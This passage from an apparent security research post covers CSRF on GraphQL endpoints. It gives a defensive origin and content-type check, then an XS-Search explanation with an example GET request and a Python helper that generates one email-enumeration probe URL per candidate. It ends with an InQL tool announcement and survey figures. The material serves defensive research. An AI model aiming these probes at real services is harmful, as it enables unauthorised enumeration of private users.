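As one possible combination of these measures, the framework-agnostic Python sketch below accepts a GraphQL request only if it is a POST with a JSON content type and comes from a trusted origin. The trusted origin, the function name, and the decision to reject GET entirely (stricter than only blocking mutations) are assumptions for illustration, not a recommendation for every deployment.

```python
from typing import Mapping
from urllib.parse import urlsplit

# Hypothetical allow-list; a real deployment would load this from configuration.
TRUSTED_ORIGINS = {"https://app.example.com"}


def is_graphql_request_allowed(method: str, headers: Mapping[str, str]) -> bool:
    """Allow only JSON POST requests that originate from a trusted origin."""
    normalized = {key.lower(): value for key, value in headers.items()}

    # No GET: plain links, images, and iframes can no longer trigger operations.
    if method.upper() != "POST":
        return False

    # HTML forms cannot send application/json, so form-based CSRF is rejected.
    media_type = normalized.get("content-type", "").split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return False

    # Origin verification, falling back to the Referer header when Origin is absent.
    origin = normalized.get("origin")
    if origin is None:
        parts = urlsplit(normalized.get("referer", ""))
        origin = f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else None
    return origin in TRUSTED_ORIGINS
```

A check like this belongs in front of any middleware that translates other body formats into GraphQL requests; otherwise the translation happens before the check and defeats it.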

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm their existence or accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query into an attacker-controlled binary search (e.g. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"foo@bar.com") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...
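Generating one such GET request per candidate value is straightforward. The Python sketch below builds the probe URL for a given email address; the function name and the candidate value are illustrative, and the timing measurement itself, which happens in the victim's browser, is left out.

```python
import json
from urllib.parse import urlencode

# Query text from the example above, with a placeholder for the quoted email.
QUERY_TEMPLATE = "query {\n\tisEmailAvailable(email:%s) {\n\t\tis_email_available\n\t}\n}"


def probe_url(endpoint: str, email: str) -> str:
    """Build the GET URL that asks whether the given email is available."""
    # json.dumps adds the surrounding quotes and escapes embedded quotes.
    query = QUERY_TEMPLATE % json.dumps(email)
    return endpoint + "?" + urlencode({"query": query})


url = probe_url("/graphql", "foo@bar.com")
```

For foo@bar.com, url is identical to the request target in the GET request above; iterating over a list of candidate addresses yields one probe per guess.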

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

  • By identifying various classes of CSRF through new “Send to Repeater” helpers:

    • GET query parameters
    • POST form-data
    • POST x-form-urlencoded
  • By improving the query generation

Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:

  • 14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
  • 3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

References